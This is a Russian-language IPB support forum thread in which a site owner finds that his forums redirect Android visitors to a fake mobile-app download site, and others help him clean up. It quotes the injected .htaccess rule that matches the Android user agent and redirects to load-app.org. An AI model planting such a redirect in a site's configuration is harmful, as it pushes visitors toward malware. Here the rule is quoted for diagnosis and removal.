Catalo Опубликовано 18 ноября, 2014 Поделиться Опубликовано 18 ноября, 2014 Сегодня при попытке зайти на сайт с мобильного телефона меня перекинуло на какой-то левый сайт с предложением скачать мобильную версию. load-app.org/m/mobile_version=ClearRu - вот адрес того левого сайта. Проверил другие форумы на своей учетки (еще 3) - и там тоже самое!! Проверил с другого мобильника - тоже самое. При этом на ПК все отлично работает, проблема с сайтом только на мобильных устройствах. Версия форумов везде 3.4.6, с момента выхода этой версии ipb ничего не обновлял, каюсь, вижу что уже 3.4.7 есть.. Подскажите как теперь действовать, как убрать этот вирус в срочном порядке. Мой сайт: jcbforum.ru ХЕЛП!!! Цитата Ссылка на комментарий Поделиться на другие сайты Поделиться
MontiQ Опубликовано 18 ноября, 2014 Поделиться Опубликовано 18 ноября, 2014 Зашел на сайт через телефон , все гуд, кроме того что темы не открываются там ошибка Цитата Ссылка на комментарий Поделиться на другие сайты Поделиться
IAF Опубликовано 18 ноября, 2014 Поделиться Опубликовано 18 ноября, 2014 Catalo, .htaccess проверьте. Catalo 1 Цитата Ссылка на комментарий Поделиться на другие сайты Поделиться
Catalo Опубликовано 18 ноября, 2014 Автор Поделиться Опубликовано 18 ноября, 2014 IandroidFan, ОГОГО как такое возможно?? RewriteEngine on RewriteCond %{HTTP_USER_AGENT} "Android" [NC] RewriteRule ^(.*)$ __load-app.org/m/?mobile_version=CleanRu [L,R=302] эта запись находилась в .htaccess Зашел на сайт через телефон , все гуд, кроме того что темы не открываются там ошибка как выяснилось только к андройду применимо... Цитата Ссылка на комментарий Поделиться на другие сайты Поделиться
MontiQ Опубликовано 18 ноября, 2014 Поделиться Опубликовано 18 ноября, 2014 Кто и как залес к тебе в .htaccess ? Цитата Ссылка на комментарий Поделиться на другие сайты Поделиться
LvsF Опубликовано 18 ноября, 2014 Поделиться Опубликовано 18 ноября, 2014 '?do=embed' frameborder='0' data-embedContent>> ОГОГО как такое возможно??Либо не ставили патчи, либо поставили поздно. Catalo 1 Цитата Ссылка на комментарий Поделиться на другие сайты Поделиться
blend Опубликовано 18 ноября, 2014 Поделиться Опубликовано 18 ноября, 2014 Сегодня при попытке зайти на сайт с мобильного телефона меня перекинуло на какой-то левый сайт с предложением скачать мобильную версию. load-app.org/m/mobile_version=ClearRu - вот адрес того левого сайта. Проверил другие форумы на своей учетки (еще 3) - и там тоже самое!! Проверил с другого мобильника - тоже самое. При этом на ПК все отлично работает, проблема с сайтом только на мобильных устройствах. Версия форумов везде 3.4.6, с момента выхода этой версии ipb ничего не обновлял, каюсь, вижу что уже 3.4.7 есть.. Подскажите как теперь действовать, как убрать этот вирус в срочном порядке. Мой сайт: jcbforum.ru ХЕЛП!!! Проблема с вашим смартфоном/телефоном, подобная ситуация возникала на одном из моих форумов, гвоздь ситуации был в том, что те кто использовал iPhone и смартфоны на Android попали в тоже положение что и вы. Обратился в Яндекс-поддержку, для проверки форума, ничего не обнаружили, я посоветовал пользователям форума проверить свои телефоны на наличие троянов/вирусов, оказалось, что у тех кого перекидывало по рекламной ссылке, сидел троян.. Цитата Ссылка на комментарий Поделиться на другие сайты Поделиться
Catalo Опубликовано 18 ноября, 2014 Автор Поделиться Опубликовано 18 ноября, 2014 .htaccess исправлен на всех сайтах на учетке, где лежат форумы. Т.е. и на сайтах на других движках. Но проблему с компом исключаю, т.к. постоянно работаю с другими учетками этого же хостинга, там нет форумов ipb и там все норм. Видимо через ipb зараза проникла. Проблема с вашим смартфоном/телефоном, подобная ситуация возникала на одном из моих форумов, гвоздь ситуации был в том, что те кто использовал iPhone и смартфоны на Android попали в тоже положение что и вы. Обратился в Яндекс-поддержку, для проверки форума, ничего не обнаружили, я посоветовал пользователям форума проверить свои телефоны на наличие троянов/вирусов, оказалось, что у тех кого перекидывало по рекламной ссылке, сидел троян.. я уже выше написал в чем проблема, и она не в смартфоне. а в посторонней записи в htaccess. '?do=embed' frameborder='0' data-embedContent>> Либо не ставили патчи, либо поставили поздно. спасибо за ссылку, только там так и не написали где искать злочасный шелл.. Цитата Ссылка на комментарий Поделиться на другие сайты Поделиться
LvsF Опубликовано 18 ноября, 2014 Поделиться Опубликовано 18 ноября, 2014 спасибо за ссылку, только там так и не написали где искать злочасный шелл.. Можете айболитом воспользоваться. Цитата Ссылка на комментарий Поделиться на другие сайты Поделиться
Respected Опубликовано 18 ноября, 2014 Поделиться Опубликовано 18 ноября, 2014 Catalo, обновись до 3.4.7 и проблемы исчезнут Цитата Ссылка на комментарий Поделиться на другие сайты Поделиться
LvsF Опубликовано 18 ноября, 2014 Поделиться Опубликовано 18 ноября, 2014 Catalo, обновись до 3.4.7 и проблемы исчезнут С чего бы? Если где-то сидит файл (а может и больше одного), который добавляет/изменяет код, то обновление не поможет. Цитата Ссылка на комментарий Поделиться на другие сайты Поделиться
Catalo Опубликовано 18 ноября, 2014 Автор Поделиться Опубликовано 18 ноября, 2014 Можете айболитом воспользоваться. в общем попробую и обновится, и айболитом воспользоваться.. как бы хуже не сделать только... у меня была уже эпопея с шелами, времен еще 3.3 версии ipb - это кошмар какой-то) потому и спрашиваю совета, может у кого инструкция есть как действовать.. Цитата Ссылка на комментарий Поделиться на другие сайты Поделиться
Respected Опубликовано 18 ноября, 2014 Поделиться Опубликовано 18 ноября, 2014 С чего бы? Если где-то сидит файл (а может и больше одного), который добавляет/изменяет код, то обновление не поможет. Да, конечно, заражённые файлы придётся чистить. Я сканировал антивирем по файлам сервера, в каждом форуме был шелл, помогла чистка файлов + обновление (применение патчей) Цитата Ссылка на комментарий Поделиться на другие сайты Поделиться
Andross Опубликовано 18 ноября, 2014 Поделиться Опубликовано 18 ноября, 2014 IandroidFan, ОГОГО как такое возможно?? RewriteEngine on RewriteCond %{HTTP_USER_AGENT} "Android" [NC] RewriteRule ^(.*)$ __load-app.org/m/?mobile_version=CleanRu [L,R=302] эта запись находилась в .htaccess как выяснилось только к андройду применимо... Запроси у хостера все изменения в файлах php на сервере,например за последнюю неделю! У них такая возможность есть.Вот от этого и отталкивайся. Цитата Ссылка на комментарий Поделиться на другие сайты Поделиться
Catalo Опубликовано 19 ноября, 2014 Автор Поделиться Опубликовано 19 ноября, 2014 базу данных чистить не надо? с файлами разбирусь Цитата Ссылка на комментарий Поделиться на другие сайты Поделиться
Respected Опубликовано 19 ноября, 2014 Поделиться Опубликовано 19 ноября, 2014 Нет, базу трогать не нужно Цитата Ссылка на комментарий Поделиться на другие сайты Поделиться
Catalo Опубликовано 20 ноября, 2014 Автор Поделиться Опубликовано 20 ноября, 2014 откатил файлы дор заражения и закинул туда новые картинки. вроде все хорошо, всем спасибо. пойду обновляться Цитата Ссылка на комментарий Поделиться на другие сайты Поделиться
Рекомендуемые сообщения
Присоединяйтесь к обсуждению
Вы можете написать сейчас и зарегистрироваться позже. Если у вас есть аккаунт, авторизуйтесь, чтобы опубликовать от имени своего аккаунта.
Примечание: Ваш пост будет проверен модератором, прежде чем станет видимым.